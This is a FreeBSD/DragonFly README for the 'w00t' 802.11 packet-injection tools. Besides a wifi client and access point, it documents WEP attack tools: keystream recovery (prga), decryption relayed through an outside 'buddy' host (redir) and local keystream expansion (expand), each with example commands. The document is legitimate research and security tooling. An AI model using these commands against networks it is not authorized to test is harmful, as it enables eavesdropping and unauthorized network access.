xref: /dragonfly/tools/tools/net80211/w00t/README (revision 9348a738) 
1$FreeBSD: src/tools/tools/net80211/w00t/README,v 1.2 2009/07/24 15:31:22 sam Exp $
2
3This is a collection of tools that use raw 802.11 packet injection.
4None of the tools configure the interface, so be sure to run something
5like:
6
7ifconfig wlan create wlandev ath0 wlanmode ahdemo channel 7 promisc up
8
9beforehand.  The following tools are found here:
10
11assoc	A wifi client.
12ap	A wifi access point.
13
14prga	Gives ability to transmit on a WEP network.
15redir	Gives ability to decrypt in real-time on a WEP network, via Internet.
16expand	Gives ability to decrypt locally on a WEP network.
17
18All these tools depend on:
19
20libw00t	Utility functions used by all tools.
21
22Detailed explanation of tools.
23==============================
24
25assoc:
26
27Acts as a wifi client.  It will associate to a network and bind a
28tap interface to it.  The interface may be used like a standard eth
29interface attached to a normal LAN.  Multiple instances of the
30program may be run in order to connect to multiple APs simultaneously.
31Example:
32
33./assoc -s w00t -t tap0
34ifconfig tap0 192.168.0.123 up
35ping 192.168.0.1
36
37ap:
38
39The same as assoc, but acts as an access point.  Example:
40
41./ap -s w00t -t tap1
42ifconfig tap1 192.168.0.1 up
43tcpdump -n -i tap1
44
45[For the next set of tools, refer to http://tapir.cs.ucl.ac.uk/bittau-wep.pdf
46for theoretical information.]
47
48prga:
49
50Sniff a packet on a WEP network and obtain a keystream.  It binds
51to a tap interface which may be used to TX packets on that network.
52Example:
53
54./prga -b bssid_of_network -t tap0
55ifconfig tap0 192.168.0.123 up
56ping 192.168.0.1
57
58redir:
59
60Resend WEP packets to our buddy on the Internet.  The buddy will
61receive the clear-text and send it back to us via a UDP socket.
62This data is then fed back into a tap interface.  This way, data
63may be ultimately be read from the tab iface in clear-text.  Example:
64
65[Box on Internet]~# ./buddy
66./redir -d buddy_ip -b bssid -t tap0 -r wifi_rtr_mac -s wifi_src_ip -p 666
67ifconfig tap0 up
68tcpdump -n -i tap0
69
70expand:
71
72Sniff a WEP packet and do the linear keystream expansion trick to
73decrypt it.  The clear-text packet is sent to a tap interface.
74Example:
75
76./expand -b bssid -t tap0
77ifconfig tap0 up
78tcpdump -n -i tap0
79